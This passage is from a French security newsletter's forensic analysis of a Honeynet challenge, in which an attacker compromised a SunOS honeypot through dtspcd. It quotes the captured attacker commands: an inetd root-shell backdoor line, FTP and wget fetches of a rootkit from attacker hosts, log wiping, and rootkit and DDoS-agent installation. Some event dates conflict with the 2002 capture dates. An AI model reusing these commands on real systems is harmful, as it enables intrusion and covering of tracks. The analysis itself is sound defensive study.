Le site officiel du projet OpenBSD
Le site du projet SpamAssassin
Internet Spam Prevention Early Warning
Liste de Netblocks coréen et chinois utilises par des spammers
Page 48/65
Mai 2003
TECHNIQUES
IRC IPV6 - SCAN OF THE MONTH
# Description
Proposé par les membres du projet ‘HoneyNet’ de AT&T Mexico, le défi du mois de mai consiste à analyser
l’utilisation assez particulière d’un système compromis à partir des éléments collectés par une sonde ‘snort’. Pour cela,
l’analyste aura en sa disposition les données collectées le jour de l’intrusion et celles correspondant au troisième jour
après la compromission.
L’analyste devra répondre aux questions suivantes :
1.
2.
3.
4.
5.
6.
7.
8.
9.
Quel est le système d’exploitation utilisé par le pot de miel, comment pouvez-vous le déterminer ?
Comment l’attaquant a t-il opéré pour rentrer dans le système ?
Quels ont été les systèmes utilisés durant l’attaque et comment ?
Pouvez-vous mettre en évidence les différentes séquences de l’attaque par un diagramme ?
Quel est le rôle des paquets ICMP contenant la chaîne ‘skillz’ ?
Pouvez-vous identifier le protocole non IP activé par l’attaquant et déterminer son utilisation ?
Pouvez-vous identifier la nationalité de l’attaquant ?
Quelle est l’implication de l’utilisation d’un protocole non IP sur les technologies IDS ?
Quel outil existant peut être employé pour décoder ce protocole?
Préparation de l’environnement
La première étape consiste à préparer l’environnement d’analyse sur nos systèmes LINUX et Windows. Aujourd’hui
nous n’utiliserons que l’outil ‘Ethereal’.
Validation des fichiers livrés
Les données collectées sont livrées sous la forme de deux fichiers d’archive – ‘day1.log.gz’ (2.75Mo) et
‘day3.log.gz’ (3.31Mo) - dont il convient de vérifier l’intégrité. Un rapide contrôle de la somme cryptographique
‘MD5’ des fichiers ‘.zip’ permet de s’assurer de l’intégrité de la distribution, ici:
C:> md5 day1.log.gz day3.log.gz
9875dbc9ac180366852d2a2be0ee016f
e5efade7f60209c1a45c4b0c445a1772
à comparer avec la somme donnée sur le site du défi :
day1.log.gz MD5 (day1.log.gz) = 9875dbc9ac180366852d2a2be0ee016f
day3.log.gz MD5 (day3.log.gz) = e5efade7f60209c1a45c4b0c445a1772
L’intégrité des archives téléchargées est confirmée – du moins en considérant que les sommes de contrôle
annoncées sur le site n’ont pas aussi été manipulées. La décompression des archives nous livre deux fichiers de
travail d’un volume de respectivement 6.7 Mo et 20 Mo.
Etude des données journalisées
L’étude statistique des données nous permettra d’identifier les protocoles utilisés et éventuellement certaines
anomalies.
Jour N°1
Le chargement du fichier ‘day1’ sous ‘Ethereal’ nous permet d’obtenir les informations suivantes sur le contexte:
• Quelques 18843 paquets ont été journalisés entre le 29 novembre 2002 à 7h26 et le 30 Novembre à 7h19.
• La fonction d’analyse statistique présente dans ‘Ethereal’ nous permet d’établir une liste des protocoles présentés
triés par activité:
Niveau
IP
Protocole/Service
ICMP
TCP
DATA
FTP control
FTP data
HTTP
DG Gryphon
IRC
UDP
DNS
NetBIOS
SysLog
Nb. Paquets
Soit en %
12773
4125
71
958
1293
420
418
3948
3940
5
3
67,79
21,89
0,38
5,08
6,86
2,23
0,10
20.95
20,91
0,03
0,02
Cette rapide étude met en évidence deux ‘anomalies’ qu’il sera nécessaire d’analyser: l’utilisation d’un ou plusieurs
protocoles TCP non identifiés (référencé(s) par le terme ‘DATA’) et d’un protocole identifié comme étant le
protocole ‘DG Gryphon’. Pour mémoire, sous ‘Ethereal’ la notion d’identification repose sur l’analyse du numéro de
port destination qui, s’il ne correspond à aucun service connu, sera référencé par le terme générique de ‘DATA’.
Page 49/65
Mai 2003
Le positionnement d’un filtre ‘ip.addr eq 192.168.100.28’ permet de confirmer que les évènements journalisés
dans ce fichier concernent tous le système compromis dont l’adresse ‘192.168.100.28’ nous est donnée dans la
présentation du défi.
Jour N°3
Le chargement du fichier ‘day3’ sous ‘Ethereal’ nous permet d’obtenir les informations suivantes sur le contexte:
• Quelques 123123 paquets ont été journalisés entre le 1 décembre 2002 à 7h20 et le 1 décembre 2002 à 7h19.
• La liste des protocoles utilisés est la suivante:
Niveau
IP
IPV6
Protocole/Service
ICMP
TCP
IRC
DATA
HTTP
UDP
DATA
DNS
SysLog
DIVERS Autres
ICMP
TCP
IRC
Nb. Paquets
7592
105973
955
3867
1619
2245
1573
63
13
9
3334
1765
Soit en %
6,17
86,07
0,78
3,14
1,31
1,82
1,28
0,05
0,02
0,00
2,71%
1,43
Un nouvel élément apparaît ici, rencontré pour la première fois dans le cadre des défis ‘honeynet’: l’utilisation du
protocole IP Version 6 que l’outil ‘ethereal’ gère fort heureusement parfaitement. On notera que ce protocole
semble principalement supporter une session TCP correspondant au service ‘IRC’.
Le positionnement d’un filtre ‘ip.addr eq 192.168.100.28’ permet de confirmer que les évènements journalisés
dans ce fichier concernent tous le système compromis dont l’adresse ‘192.168.100.28’ nous est donnée dans la
présentation du défi.
Levée de doute
La présence de certaines anomalies et de l’identification de l’utilisation du protocole IP V6 nous impose une phase de
levée de doute.
Jour N°1
Les deux anomalies constatées durant l’analyse du premier fichier de journalisation vont faire l’objet d’un contrôle
visant à valider l’analyse effectuée par ‘Ethereal’ notamment en ce qui concerne l’utilisation du protocole ‘DG
Gryphon’.
DG Gryphon
Le positionnement du filtre ‘gryphon’ permet de visualiser les 420 trames en cause et de mettre en évidence une
erreur d’interprétation de la part de l’outil ‘Ethereal’: de toute évidence le contenu de ces trames montre qu’il
s’agit d’une session IRC utilisant le port correspondant au protocole ‘Gryphon’. L’erreur est confirmée par la
présence de messages d’avertissement indiquant que la session ‘Gryphon’ n’a pu être reconstituée.
Page 50/65
Mai 2003
L’utilisation de l’option permettant de forcer le décodage d’un protocole particulier nous permet de corriger l’erreur
d’identification en imposant le décodage ‘IRC’ sur le port TCP/7000 en source mais aussi en destination.
On retiendra de cette analyse qu’un service ‘IRC’ est actif sur le port TCP/7000 du système étudié.
DATA
Le positionnement d’un filtre composite éliminant tous les protocoles déjà référencés (‘not ftp and not ftp-data
and not http and not irc’) et ne conservant que les demandes de connexion (‘tcp and tcp.flags.ack eq 0 and
tcp.flags.syn eq 1’) permet de visualiser les trames n’ayant pu être identifiées.
Nous mettons ainsi en évidence des tentatives de connexion sur les services :
• TCP/1433
Ms-Sql-s
• TCP/1524
IngresLock
• TCP/6112
DtSpcd
• TCP/5555
Personnal Agent
Un rapide parcours des différentes séquences d’établissement met en évidence une incohérence concernant les
sessions établies vers le service TCP/5555 qui apparaissent correspondre ici encore à des sessions ‘IRC’.
On retiendra de cette analyse qu’un service ‘IRC’ est aussi actif sur le port TCP/5555 du système étudié et l’on
forcera ici aussi le décodage de ce service.
Page 51/65
Mai 2003
Jour N°3
Il s’agit maintenant de confirmer la réalité de l’utilisation du protocole IP V6 et d’analyser les échanges non identifiés
en conservant la configuration préalablement spécifiée: décodage du protocole ‘IRC’ sur les ports ‘TCP/5555’ et
‘TCP/7000’, ce qui sera le cas si l’on charge le nouveau fichier sans avoir quitté ‘Ethereal’.
IP V6
Le positionnement du filtre ‘ipv6’ permet de visualiser les 3348 trames annoncées transmises sur ce protocole.
Il apparaît que la majorité des trames correspondent à une session ‘IRC’ établie sur le port TCP/6667 du
système cible.
DATA
Le positionnement d’un filtre identique à celui utilisé pour l’analyse du fichier précédent permet de mettre en
évidence une succession de trames dont tout laisse à penser qu’il s’agit d’une campagne de sondage initiée depuis
le système cible.
Conclusion partielle
A ce stade de notre analyse, nous avons acquis la certitude qu’un serveur ‘IRC’ a été installé sur le système
compromis et activé sur des ports non standards: TCP/5555 et TCP/7000. Nous avons aussi détecté et
confirmé l’utilisation inhabituelle du protocole IP V6. Nous allons maintenant pouvoir aborder l’étude détaillée des
échanges.
Analyse des événements
Les événements identifiés à la suite du parcours chronologique des échanges par le biais de l’outil ‘ethereal’ vont être
présentés en nous concentrant sur les seuls éléments requis pour répondre aux questions du défi ou pertinents car
mettant en avant un procédé ou une technique intéressante.
Jour N°1
Page 52/65
Mai 2003
Comme à notre habitude, nous référencerons ces évènements par le numéro du paquet associé.
Accès DNS
29 Novembre 2003 – 07h26
Les 560 premières trames correspondent majoritairement à des requêtes DNS émises par le système cible vers
presque autant de serveurs DNS externes.
Trame
1
2
559
560
Source
192.168.100.28
194.25.2.133
Service
UDP/53
Donnée
Requête ‘Query PTR 71.185.128.80.in-addr.arpa’
Réponse ‘p5080B947.dip.t-dialin.net’
192.168.100.28
194.25.2.133
UDP/53
Requête ‘Query A customermex-148-244-153-72.example.net.mx’
Réponse ‘no such name’
Le positionnement du filtre ‘dns’ met en évidence quelques 1970 requêtes ainsi qu’une période – Trames 561 à
2046 - durant laquelle aucune requête n’est émise. En l’état de l’analyse, nous considérerons que ces échanges
n’ont rien d’anormal.
Sondage NetBIOS
29 Novembre 2003 – 09h44
Une dizaine de requêtes à destination du serveur de nom NetBIOS (UDP/137) peuvent être constatées en début
et en fin de journalisation.
Trame
137
138
Source
10.12.9.141
192.168.100.28
Service
UDP/137
Donnée
Requête ‘NBSTAT’
Réponse ‘ICMP Destination unreachable’
18752
18753
218.14.182.224
192.168.100.28
UDP/137
Requête ‘NBSTAT’
Réponse ‘ICMP Destination unreachable’
Il s’agit ici probablement d’une activité classique de sondage. Toutes les requêtes reçoivent une réponse négative
sous la forme d’un paquet ICMP ‘Destination Unreachable’.
Sondage Ms-SQL-s
29 Novembre 2003 – 13h02
Quelques 18 tentatives de connexion au service ‘TCP/1433’ sont journalisées de la part de 6 systèmes, chacun
d’entre eux effectuant trois tentatives.
Trame
305
306
Source
24.167.44.129
192.168.100.28
Service
TCP/1433
Donnée
Paquet ‘SYN’
Paquet ‘RST/ACK’
17937
17938
64.231.37.135
192.168.100.28
TCP/1433
Paquet ‘SYN’
Il s’agit manifestement d’une activité de sondage classique visant à déterminer la présence de ce service dans
l’optique d’exploiter un débordement de buffer. Il est fort vraisemblable que cela soit le fait de systèmes
compromis par le ver ‘SQL-Slammer’.
Exploitation vulnérabilité service ‘dtspcd’
29 Novembre 2003 – 16h36
Le système ‘61-219-90-180.HINET-IP.hinet.net’ (61.219.90.180) ouvre avec succès une session sur le service
CDE ‘DtSpcD’ dit ‘Common Desktop Environment Subprocess Control Service’. Cette session permet
d’identifier le système cible - un système ‘SunOs 5.8’ dénommé ‘zoberius’ – afin d’adapter l’attaque.
Trame
561
562
563
564
565
566
567
Source
61.219.90.180
192.168.100.28
61.219.90.180
61.219.90.180
192.168.100.28
Service
TCP/6112
61.219.90.180
192.168.100.28
TCP/6112
TCP/1524
Donnée
Paquet ‘SYN’
Paquet ‘SYN/ACK’
Paquet ‘ACK’
Paquet ‘SYN’
Paquet ‘SYN’
569
61.219.90.180
Paquet ‘PSH’ – Autorité ‘root’
571
61.219.90.180
Paquet ‘PSH’ – Système ‘zoberius’ – Type ‘SunOS 5.8 / Sun4u’
On notera qu’un sondage du service ‘ingreslock’ (TCP/1524) est effectué juste après l’ouverture de la session
mais sans succès.
Le système ‘61-219-90-180.HINET-IP.hinet.net’ exploite ensuite avec succès le débordement de buffer
existant dans ce service – Note VU#172583 du CERT - sur la connexion ouverte précédemment (Trame 566)
mais aussi sur une seconde connexion ouverte en parallèle.
Trame
576
577
Source
61.219.90.180
192.168.100.28
Service
TCP/6112
Donnée
Paquet ‘SYN’
580
61.219.90.180
Paquet ‘ACK’ – ‘/bin/ksh sh –c echo ‘ingreslock stream tcp …’
587
192.168.100.28
Paquet ‘FIN/ACK’
La séquence shell ‘/bin/ksh sh –c echo ingreslock stream tcp nowait root /bin.sh sh –i >/tmp/x;
/usr/sbin/inetd –s /tmp/x; sleep 10; /bin/rm –f /tmp/x’ transmise dans la trame ‘580’ constitue un grand
classique déjà rencontré dans nos analyses précédentes. Elle permet l’activation d’un interpréteur de commande
interactif accessible sur le port ‘TCP/1524’. Ceci explique la séquence précédemment rencontrée visant à vérifier
que le système cible n’a pas déjà fait l’objet d’une compromission de ce type.
Page 53/65
Mai 2003
L’attaquant vérifie d’ailleurs immédiatement que son attaque a bien fonctionné en tentant de nouveau une
connexion sur la porte dérobée.
Trame
588
589
590
Source
61.219.90.180
192.168.100.28
61.219.90.180
8351
Service
TCP/1524
61.219.90.180
Donnée
Paquet ‘SYN’
Paquet ‘ACK’
Paquet ‘RST’
Cette session restera active de 16h36 à 17h00, période durant laquelle l’attaquant aura le loisir de passer une
succession de commandes. Son activité peut maintenant être suivie pas à pas en utilisant la fonction d’extraction
des flux TCP ‘Follow TCP Stream’ intégrée dans ‘Ethereal’.
Cette activité est détaillée ci-dessous, les commandes étant imprimées en rouge et les réponses en vert.
#uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:
/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export
PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk
'{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773
#wget
wget: not found
#w
9:44am up 13 day(s), 4:24,0 users,load average: 0.00, 0.00, 0.01
User
tty
login@ idle
JCPU
PCPU what
#/bin/sh -i
#unset HISTFILE
#unset DISPLAY
#mkdir /usr/share/man/man1/.old
#cd /usr/share/man/man1/.old
#ftp 62.211.66.16 21
USER bobzz
PASS joka
get wget
get dlp
get solbnc
get iupv6sun
iupv6sun: No such file or directory.
get ipv6sun
quit
#ls
dlp
ipv6sun
solbnc
wget
#chmod +x solbnc wget dlp
#./wget
wget: missing URL
Usage: wget [OPTION]... [URL]...
Try `wget --help' for more options.
#./wget http://62.211.66.53/bobzz/sol.tar.gz
--09:47:58-- http://62.211.66.53:80/bobzz/sol.tar.gz
=> `sol.tar.gz'
Connecting to 62.211.66.53:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,884,160 [application/x-tar]
0K-> ......... ......... ......... ......... ......... [ 2%]
50K-> ......... ......... ......... ......... ......... [ 5%]
100K-> ......... ......... ......... ......... ......... [ 8%]
1750K-> ......... ......... ......... ......... ......... [ 97%]
1800K-> ......... ......... ......... .........
[100%]
09:55:09 (4.27 KB/s) - `sol.tar.gz' saved [1884160/1884160]
#rrrrrretar -xf sol.tar.gz
rrrrrretar: not found
#cd sol
sol: does not exist
#./setup
./setup: not found
#cd sol
sol: does not exist
#tar -xf sol.tar.gz
#cd sol
#./setup
bobz oN ircNet on join #privè
_/
/\
\
Identification du système, recherche des
fichiers crées durant l’attaque, définition
d’un chemin d’accès par défaut et recherche
du n° de processus de la porte d’accès.
-> Système SunOS 5.8 sur Ultra5 ou 10
Appel de l’utilitaire ‘wget’
-> Inexistant
Identification des utilisateurs connectés
-> Personne
Ouverture d’un interpréteur dédié
Arrêt de la journalisation des commandes
Désactivation du display X11
Création d’un répertoire de travail masqué
Positionnement dans ce répertoire
Transfert ‘ftp’, ‘wget’ n’étant pas présent
-> Compte sur le système distant
-> mot de passe associé
Récupération de l’utilitaire ‘wget’
Récupération de l’utilitaire ‘dlp’
Récupération de l’utilitaire ‘solbnc’
Récupération du paquetage ‘iupv6sun’
-> paquetage inexistant
Correction de l’erreur de typographie
Fin de la session ftp
Vérification
-> Utilitaire à identifier
-> Pile IP V6 pour système SUNOS
-> proxy IRC
-> Transfert de fichier
Autorisation d’exécution des utilitaires
Transfert via ‘wget’
-> Il manque un paramètre !
Transfert du fichier ‘sol.tar.gz’
-> Transfert autorisé
Décompression de l’archive
-> Erreur, caractères ‘parasites’
Changement de répertoire
-> Erreur, inexistant
Lancement de l’installation
Décompression de l’archive
Lancement de l’installation
-> Connexion IRC ?
-> L’indispensable signature !
/\
___|
\
Autor: bobz
/
\/
|___
/
\_
\
/
\/
Page 54/65
Mai 2003
********
********
**
******* **********
******* **
**
** **
**
******* **
**
******* **
**
**********
**
**
**
**
**
**
******
******
**
**
**
**
**
**
**
*
*
*
*
********
**********
**
**
**
**
**
**
/\
/\
_/
\
___| Autor: bobz
\
|___
/
/
\/
\_
\
/
\/
...:::[ Autore bobz ]:::...
...:::[ On IRcnEt On Join #bobz ]:::...
Ti:AmO:RosariA
Delete Logz...
Deleting /var/log...
/var/log/secure: No such file or directory
...
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
...
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
...
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
...
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
...
/var/log/spooler.4: No such file or directory
LogZ Cancellati...
Delete LogZ by warning
Starting up at: 1038585350
Installing from /usr/share/man/man1/.old/sol
Will erase /usr/share/man/man1/.old/sol after install
Checking for existing rootkits..
Checking for existing rootkits..
checking /etc/rc2 and /etc/rc3 for rootkits...
Rootkits Removed from config files
checking crond configs for rootkits...
Rootkits Removed from crond config files
*** WARNING *** suspicious files found in /dev
Insert Rootkit Password : mixer
Using Password mixer
Insert Rootkit SSH Port : 5001
Using Port 5001
Insert Rootkit PsyBNC Port : 7000
Using Port 7000
File processed...
Making backups...
su ping du passwd find ls netstat strings ps Done.
Installing trojans...
login sshd netstat ls find strings du passwd ping su
Complete.
Suid removal
at atq atrm eject fdformat rdist rdist admintool ufsdump
ufsrestore quota ff.core lpset lpstat netpr arp chkperm
Complete.
PS Trojaned
Primary network interface is of type: hme
Copying utils.. passgen fixer wipe utime crt idstart ssh-dxe syn
README
Done.
psyBNC has now been configured on port 7000 with no IDENT
Starting Patcher...
-> Une dédicace en italien
-> Phase N°1 : Destruction des journaux
-> Phase N°2 : Piégeage du système
Recherche de ‘rootkits’ préexistants et
désinstallation de ceux-ci
-> Phase N°4 : Configuration du ‘rootkit’
- Mot de passe
- Porte dérobée SSH sur TCP/5001
- Proxy IRC sur TCP/7000
-> Phase N°5 : Sauvegarde et installation
Sauvegarde
Substitution
Confirmation du piégeage de ‘ps’
Confirmation de l’installation du proxy
-> Phase N°6 : Sécurisation du système
Page 55/65
Mai 2003
* Patching...
DTSCD PATCHED
LPD PATCHED
fingerd
cmsd
ttdbserverd
sadmind
statd
rquotad
rusersd
cachefsd
bindshells
snmpXdmid
Done.
09:56:21-- ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done.
==> RETR 111085-02.zip ... done.
Length: 27,300 (unauthoritative)
0K-> ......... ......... ......
[100%]
09:56:45 (1.83 KB/s) - `111085-02.zip' saved [27300]
Archive: 111085-02.zip
creating: 111085-02/
inflating: 111085-02/.diPatch
...
inflating: 111085-02/SUNWcsu/reloc/usr/bin/login
inflating: 111085-02/README.111085-02
Copyright 2001 Sun Microsystems, Inc. All rights reserved.
This appears to be an attempt to install the same architecture
and version of a package which is already installed. This
installation will attempt to overwrite this package.
PaTcH_MsG 2 Patch number 111085-02 is already applied.
Installation of <SUNWcsu> was suspended (administration).
No changes were made to the system.
09:56:49-- ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done. ==> CWD pub/patches ... done.
==> PORT ... done.
==> RETR 108949-07.zip ... done.
Length: 1,033,092 (unauthoritative)
0K-> .......... ......... ......... ......... ......... [ 4%]
50K-> .......... ......... ......... ......... ......... [ 9%]
...
950K-> .......... ......... ......... ......... ......... [ 99%]
1000K->.......
10:01:00 (4.20 KB/s) - `108949-07.zip' saved [1033092]
...
inflating: 108949-07/postpatch
Installation of <SUNWdtbas> was successful.
Installation of <SUNWdtbax> was successful.
...
inflating: 111606-02/SUNWftpu/reloc/usr/sbin/in.ftpd
Installation of <SUNWftpu> was successful
Erasing rootkit...
#./startbnc
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o ||
\| || ,--'
| _/ _\ \
\ / | o< | |\
|| |__
|_| |____/
|__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Liste des correctifs à appliquer
Acquisition du correctif N°1 sur le site SUN
Décompression du correctif 111085-02
Le correctif 111085-02 est déjà installé !
Acquisition du correctif N°2 sur le site SUN
-> Installation effectuée
-> Phase N°7 : Destruction des fichiers
Initialisation du proxy IRC
dans sa version 2.2.1
Page 56/65
Mai 2003
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
psyBNC installed - loaded on reboot :>
#cd ..
#./solbnc
#./dlp
Delete LogZ by bobbino
Deleting /var/log...
/var/log/secure: No such file or directory
...
/var/log/boot.log: No such file or directory
...
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
...
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
...
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
...
/var/log/spooler.4: No such file or directory
LogZ Cancellati...
Delete LogZ by bobbino
Root
167
1 0
Nov 16 ?
0:00 /usr/sbin/inetd -s
root 3325 3265 0 10:02:25 ?
0:00 grep inetd
Patch.....
Attivata by RyO
#
Lancement du proxy IRC
Destruction des traces
Encore une signature mais en roumain
L’étude détaillée de l’activité de l’attaquant sur la session ouverte via la porte dérobée activée sur le port
‘TCP/1524’ nous permet de confirmer les hypothèses initiales concernant l’installation d’un proxy ‘IRC’ actif sur
le port TCP/7000 mais ne nous donne aucune information concernant les sessions ‘IRC’ ouvertes vers le port
TCP/5555.
Nous apprenons par ailleurs :
- qu’une porte dérobée SSH est activée sur le port TCP/5001,
- que le système est désormais sécurisé par l’application des correctifs en provenance directe de SUN,
- que le module ‘ipv6sun’ n’a pas encore été activé
- que toutes les traces des manipulations effectuées ont été effacées,
- que le proxy IRC installé, dénommé ‘PsyBNC’, journalise des informations dans le répertoire ‘log/psybnc.log’,
- que le pseudo de l’attaquant est ‘bobzz’ et qu’il dispose d’un accès sur les systèmes ‘61.219.90.180’,
‘62.211.66.16’ et ‘62.211.66.53’. On notera que le bloc d’adresses associé est géré par ‘Telecom Italia’.
Une recherche sur Internet avec ces différents éléments nous conduit sur le site d’une équipe de pirates roumains
(‘http://linuxgov.freehomepage.com/’) proposant un rootkit dénommé ‘sol.tar.gz’ (inaccessible au moment de
l’écriture de cet article) mais aussi un article sur l’utilisation de ‘PsyBNC’ et enfin un jeu dénommé ‘BOB’. Ces
éléments laissent à penser que nous pourrions avoir identifié la source du ‘rootkit’ voire peut être l’auteur de
l’attaque.
Alertes Syslog
29 Novembre 2003 – 16h53
Le positionnement d’un filtre éliminant le trafic déjà analysé nous permet de mettre en évidence les activités ayant
pu être engagées durant la fenêtre correspondant à l’attaque (Trames 561 à 8351).
not ip.addr eq 62.211.66.53 and not ip.addr eq 62.211.66.16 and not ip.addr eq 61.219.90.180 and
not ip.addr eq 192.18.99.122 and
not dns
Systèmes contrôlés
Site SUN
Requêtes DNS
Ce filtre permet d’identifier trois trames ‘syslog’ envoyées par le système cible à destination de l’adresse
‘192.168.100.28’ correspondant à un système dans le plan d’adressage local.
Trame
5416
5419
5429
Source
192.168.100.28
192.168.100.28
192.168.100.28
Service
UDP/514
Donnée
Warning ‘inetd … /usr/dt/bin/rpc.cms: killed’
Warning ‘inetd … /usr/sbin/admind: killed’
Warning ‘inetd … /tmp/x: no such file or directory’
Ces trois messages d’alertes sont directement liés à la phase initiale de l’attaque correspondant à l’exploitation du
débordement de buffer dans le service ‘dtspcd’. Ces messages qui sont on ne peut plus significatifs d’une
tentative réussie de compromission doivent, normalement, provoquer une réaction immédiate de la part de
l’exploitant.
Annonces ICMP
29 Novembre 2003 – 17h01
Immédiatement après que le ‘rootkit’ ait été installé, une activité ‘ICMP’ est engagée par le système compromis à
destination des systèmes ‘217.116.38.10’ et ‘61.134.3.11’. Le positionnement d’un filtre dédié nous permet de
découvrir qu’il s’agit d’une activité de fond régulière consistant en l’envoi toutes les 61 secondes d’une réponse
‘ICMP’ contenant la chaîne de caractère ‘skillz’.
Trame
Source
Service
Donnée
Page 57/65
Mai 2003
8355
8356
192.168.100.28
192.168.100.28
18818
192.168.100.28
ICMP
Echo Reply ‘skillz’
Sont ainsi envoyés quelques 846 paquets vers le système ‘217.116.38.10’ et 846 paquets vers le système
‘61.134.3.11’ sur la période de journalisation du premier jour. En temps normal, un paquet ‘ICMP Echo reply’
n’est transmis qu’à la suite de la réception d’une requête ‘ICMP Echo’, requête qui sera généralement filtrée en
amont par les dispositifs de sécurité.
L’activité ici détectée est donc anormale. Il s’agit d’un procédé désormais classique permettant d’établir un
protocole d’échange sur le protocole ‘ICMP’ en passant à travers les dispositifs de filtrage sans gestion d’état qui
se conteraient donc de filtrer la requête.
Une recherche sur l’Internet avec les mots clefs ‘ICMP’ et ‘skillz’ nous apprend que cette activité est celle d’un
outil de déni de service installé en lieu et place du service ‘dtspcd’ original et intégrant le client ‘stacheldraht’.
Celui communique avec son contrôleur – ici installé sur les systèmes ‘217.116.38.10’ et ‘61.134.3.11’ par le
biais de réponses ICMP contenant la signature ‘skillz’, le contrôleur envoyant ses commandes par le même
procédé mais en utilisant la signature ‘ficken’.
Activité IRC
29 Novembre 2003 – 17h04
Nous pouvons maintenant compléter notre filtre pour éliminer le trafic et mettre en évidence une première activité
‘IRC’ engagée par le système ‘80.117.14.44’.
Trame
8362
8363
8364
8365
Source
80.117.14.44
192.168.100.28
80.117.14.44
80.117.14.44
16900
80.117.14.44
Service
TCP/7000
Donnée
Paquet ‘SYN’
Paquet ‘ACK’
PASS fargetta
Paquet ‘RST’
Rappelons pour la bonne compréhension de l’analyse que l’attaquant s’est connecté à un proxy, c’est-à-dire à un
service assurant le relayage de ses commandes vers le serveur IRC final, à savoir le système ‘irc-1.stealth.net’.
Nous devrions donc détecter un second flux ‘IRC’ établi entre le proxy et le serveur ‘IRC’ final.
Le positionnement d’un filtre ad’hoc permet de confirmer cette hypothèse et d’identifier le port utilisé, à savoir le
port ‘TCP/5555’ !
Trame
8564
8566
8567
8568
Source
192.168.100.28
206.252.192.195
192.168.100.28
192.168.100.28
Service
TCP/5555
Donnée
Paquet ‘SYN’
Paquet ‘ACK’
USER ahaa ahaa 127.0.0.1 :ownz
206.252.192.195
ERROR : Closed link
8587
8589
8590
192.168.100.28
206.252.192.195
192.168.100.28
192.168.100.28
Paquet ‘SYN’
Paquet ‘ACK’
8614
206.252.192.195
ERROR : Closed link
8621
8623
8624
8625
192.168.100.28
206.252.192.195
192.168.100.28
192.168.100.28
Paquet ‘SYN’
Paquet ‘ACK’
8631
206.252.192.195
Message ‘irc.stealth.net: 1 Welcome to the Internet Relay …’
192.168.100.28
Paquet ‘RESET’
16892
L’analyse des échanges effectués entre le proxy et le serveur ‘IRC’ met en évidence l’existence de deux tentatives
de connexion rejetées pour cause de saturation du service. La troisième tentative est la bonne et l’attaquant est
connecté sur le réseau ‘irc.stealth.net’ depuis un système identifié comme connecté sur un accès géré par le FAI
Italien ‘Interbusiness’: ‘host44-14.pool80117.interbusiness.it’.
Nous avons désormais la possibilité de reconstituer l’ensemble des échanges en identifiant les actions engagées
par l’attaquant et leur traduction par le proxy. Le volume de données échangées – 145Ko – nous conduit à
travailler prioritairement sur les échanges effectués entre le proxy et le serveur ‘IRC’. L’analyse de ceux-ci
confirme l’utilisation de la langue italienne par l’attaquant ainsi que l’utilisation de ce réseau ‘IRC’ par une
communauté de pirates Italiens.
La teneur des échanges est peu intéressante à l’exception de quelques conversations portant sur l’utilisation du
protocole IP V6 et plus particulièrement de l’utilitaire ‘ping6‘. On y apprend aussi l’existence d’un réseau ‘IRC IP
V6’ dénommé ‘ThE iRc FrIeNdS’ accessible via le serveur ‘irc6.edisontel.it’.
On notera que l’étude des conversations acquises sous la forme de données ‘brutes’ est une tâche d’autant plus
fastidieuse qu’il n’existe encore aucun outil d’aide à l’analyse permettant notamment de présenter les échanges
sous une forme facilitant leur lecture.
L’utilisation d’un filtre éliminant les éléments déjà analysés permet de s’assurer qu’aucun événement important
n’a été oublié.
Page 58/65
Mai 2003
L’attaquant, probablement un Italien ou un Roumain utilisant le pseudonyme ‘bobz’, a pris le contrôle du système
cible, un SUN, en exploitant un débordement de buffer présent dans le service ‘dtspcd’. A l’aide d’un outil de type
‘rootkit’, l’attaquant a piégé cette machine en installant une porte dérobée SSH a priori non utilisée ainsi qu’un
proxy IRC. Les traces de cette compromission ont été masquées en détruisant les fichiers de journalisation et en
installant une version modifiée des principaux utilitaires systèmes. Enfin, le service ‘dtspcd’ original a été remplacé
par un agent de déni de service distribué de type ‘stacheldraht’, agent a priori non encore activé.
Les systèmes suivants ont été utilisés par l’attaquant:
Adresse IP
61.219.90.180
62.211.66.16
62.211.66.53
61.134.3.11
217.116.38.10
80.117.14.44
Nom DNS
61-219-90-180.HINET-IP.hinet.net
inconnu
inconnu
Inconnu
nocfft1.etel.hu
host44-14.pool80117.interbusiness.it
FAI:
FAI:
FAI:
Sté:
FAI:
FAI:
Propriétaire des adresses
Chunghwa Telecom Co. (Chine)
Telecom Italia
Telecom Italia
SNXIAN (Chine)
eTel Hungary
Telecom Italia
Utilisation
Compromission initiale
Transfert FTP de wget, …
Transfert HTTP du rootkit
Contrôleur du client DDoS
Client IRC
Jour N°3
Comme à notre habitude, nous référencerons ces évènements par le numéro du paquet associé.
Activité DNS
01 Décembre 2003 – 07h26
Une activité DNS soutenue continue d’être constatée qui porte dans certains cas sur des systèmes référencés dans
